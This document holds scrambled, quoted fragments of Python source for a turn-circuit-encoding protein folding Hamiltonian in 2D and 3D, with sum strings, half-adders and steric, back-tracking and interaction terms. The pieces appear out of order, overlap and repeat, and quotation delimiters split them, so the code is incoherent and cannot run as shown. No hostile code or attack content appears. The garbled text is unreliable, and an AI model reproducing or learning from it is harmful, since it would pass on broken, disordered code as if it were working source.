range(self.naas-1)]) def", "qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for", "the string describing the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements", "sumstring['z-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ *", "deepcopy from itertools import chain from functools import reduce from .qlogic import *", "\"\"\"Computes the overlap term for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if", "self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self,", "+= 1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b", "qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for", "maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if maximum == 0:", "range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term for residues i and", "form, described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits =", "a_x(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j,", "self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "to the start of the string describing the ith turn.\"\"\" return 3*i def", "2 def pointer(self, i): \"\"\"Points to the start of the string describing the", "self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms", "\\ 
self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1))", "reversed(range(n_layers-1))): if t % 2 == 0: iterator = range(0, t+1, 2) if", "sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)]", "2) if t > 0 else [0] else: iterator = range(1, t+1, 2)", "[self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'x-': sum_string", "= (self.naas+1) * self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term()", "iterator: if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue else: counter[h] +=", "0 else 0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r],", "0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return", "for x in range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the term", "* qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2,", "q_j * q_k def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if", "sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\ +", "'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in", "t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter", "go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), 
self.get(self.pointer(i+1)+2))", "in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)])", "sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise ValueError('k was", "return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r", "if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r", "i): \"\"\"Points to the start of the string describing the ith turn.\"\"\" return", "from abc import * from tqdm import tqdm, trange from copy import deepcopy", "if i > j: raise ValueError(\"i > j\") if (i, j, k) in", "* (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "as np import sympy as sp import symengine as se from abc import", "return q_i * (1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a", "continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property", "== 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif", "k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self):", "'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]", "a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * q_j *", "that returns 1 if the chain moves in the direction x-.\"\"\" return q_i*(1-q_j)", "self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y-': sum_string =", "keep track of half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if", "r in range(maximum)]) return prefactor * \\ ( 
qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([", "return self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for", "\\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] +", "return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "* (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit' def build_exp(self):", "sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return", "by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim *", "direction y+.\"\"\" return q_i * (1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k):", "import symengine as se from abc import * from tqdm import tqdm, trange", "range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self, i, j): sumstring = {", "self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['y', 'z']]) return", "k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['x', 'y']])", "sumstring['y-'][r]) for r in range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\", "'y-': 
sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise ValueError('k", "+ sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1,", "'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if maximum", "elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)]", "qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for", "sumstring['x+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r", "j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+': sum_string", "symengine as se from abc import * from tqdm import tqdm, trange from", "= a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j,", "self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)])", "j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in", "sum([ self.overlap(i, j) for j in range(i+1, self.naas)]) for i in range(self.naas)]) def", "import sympy as sp import symengine as se from abc import * from", "the \"turn circuit encoding\" form, described by Babbush et al., 2012.\"\"\" 
self._proc_input(pepstring) self.ss_fmat", "= dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1)", "qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def", "direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns", "return q_i * (1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a", "sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r", "range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += interaction_term_ij(i, 1+i+2*j) return", "(1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3): for j in", "build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2", "a circuit that returns 1 if the chain moves in the direction x-.\"\"\"", "sumstring['x-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ *", "= qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0],", "return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'),", "True @property def dim(self): return 3 def pointer(self, i): \"\"\"Points to the start", "1 if the chain moves in the direction y-.\"\"\" return q_i * q_j", "chain moves in the direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def", "return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim == 3:", "se from abc import * from tqdm import tqdm, trange from copy import", "\"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) 
@property @abstractmethod def dim(self): pass", "range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the chain does not", "self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain", "\\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for", "% k][r]) for r in range(maximum)]) for k in ['y', 'z']]) return prefactor", "from functools import reduce from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian class", "* qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2,", "range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r])", "k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "moves in the direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k def circuit_zn(self,", "y+.\"\"\" return q_i * (1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements", "k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for", "self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) +", "y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if", "else: counter[h] += 
1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1]", "j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j,", "t in range(i, j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r],", "range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does not overlap.\"\"\" return sum([", "the string describing the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k):", "maximum+1)])) def a_z(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-':", "self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)),", "j)] else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) #", "r in range(maximum)]) for k in ['x', 'y']]) return prefactor * \\ (", "in range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self, i, j): sumstring =", "self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue else: counter[h] += 1 a,", "tqdm import tqdm, trange from copy import deepcopy from itertools import chain from", "direction y-.\"\"\" return q_i * q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k):", "for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i,", "returns 1 if the chain moves in the direction x+.\"\"\" return q_i *", "moves in the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a", "j): return -1 * self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j))", "numpy as np import sympy as sp 
import symengine as se from abc", "j, k): \"\"\"Computes the sum string.\"\"\" if i > j: raise ValueError(\"i >", ") def steric_term(self): \"\"\"Ensures that the chain does not overlap.\"\"\" return sum([ sum([", "(1-q_i) * q_j * (1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "chain moves in the direction x-.\"\"\" return q_i * (1-q_j) * (1-q_k) def", "j): return -1* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j) +", "* self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)),", "j) for j in range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self, i,", "sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ *", "the overlap term for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j", "self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in", "j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum =", "+= self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self):", "0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return", "interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j] * (self.a_x(i, j) + \\", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i,", 
"sumstring['y-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ *", "(1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical", "CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods", "r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1,", "circuit that returns 1 if the chain moves in the direction z+.\"\"\" return", "in ['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([", "self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i", "2 != 0 or maximum < 2: return sp.numbers.Integer(0) sumstring = { 'x+':", "== 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr", "math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr", "for h in iterator: if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue", "j\") if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k", "(self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def", "expression and methods of a protein hamiltonian of the \"turn circuit encoding\" form,", "\"\"\"Computes the sum string.\"\"\" if i > j: raise ValueError(\"i > j\") if", "j, k)] def redun_term(self): \"\"\"Implements the term that penalises meaningless residue bitstrings 000", "bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\"", "i, j, k): \"\"\"Computes the sum string.\"\"\" if i > j: raise ValueError(\"i", "= j-i-1 counter = np.zeros(n_layers) # lazy way to keep track 
of half-adders", "t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for", "hamiltonian of the \"turn circuit encoding\" form, described by Babbush et al., 2012.\"\"\"", "returns 1 if the chain moves in the direction y+.\"\"\" return q_i *", "does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)),", "elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0: iterator = range(0, t+1, 2)", "y-.\"\"\" return q_i * q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements", "raise ValueError(\"i > j\") if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j,", "qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\", "t+1, 2) if t > 1 else [1] for h in iterator: if", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)),", "self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the kth", "circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j,", "counter[h] += 1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] =", "qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class 
TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property", "sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\ *", "j): \"\"\"Computes the overlap term for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j))))", "if the chain moves in the direction y-.\"\"\" return q_i * q_j *", "* from tqdm import tqdm, trange from copy import deepcopy from itertools import", "== 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D =", "r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j):", "self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term", "\\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ * qand([", "} maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if maximum ==", "\\ self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\"", "for i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] ==", "the chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) *", "* \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in", "'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k ==", "is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of", "* self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr +=", "sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k ==", 
"def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain", "circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\"", "t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "in range(i, j)] elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i)", "t > 0 else [0] else: iterator = range(1, t+1, 2) if t", "'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum ==", "'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]", "k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['x', 'z']])", "self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes", "j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand(", "[self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y-': sum_string =", "way to keep track of half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers),", "(self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr =", "if the chain moves in the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i,", "* q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "the direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that", "* self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), 
self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2))", "for p in range(2, maximum+1)])) def a_y(self, i, j): sumstring = { 'x+':", "q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True", "for k in ['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\", "@abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)),", "j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if (j-i) %", "qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1])", "== 'babej': if counter[h] > math.log2(j-i): continue else: counter[h] += 1 a, b", "'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') }", "not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for j in range(i+1, self.naas)]) for", "range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_z(self, i, j): sumstring =", "if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k ==", "def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r in", "2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = 
self.dim * (self.naas-1) self._sum_strings = dict()", "range(1, t+1, 2) if t > 1 else [1] for h in iterator:", "== 0: iterator = range(0, t+1, 2) if t > 0 else [0]", "return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a", "range(i, j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D", "q_j): \"\"\"Implements a circuit that returns 1 if the chain moves in the", "between residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3): for j in range(1,", "interaction_term_ij(self, i, j): return -1* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i,", "'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k", "sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)])", "return (1-q_i) * q_j * (1-q_k) def circuit_000(self, 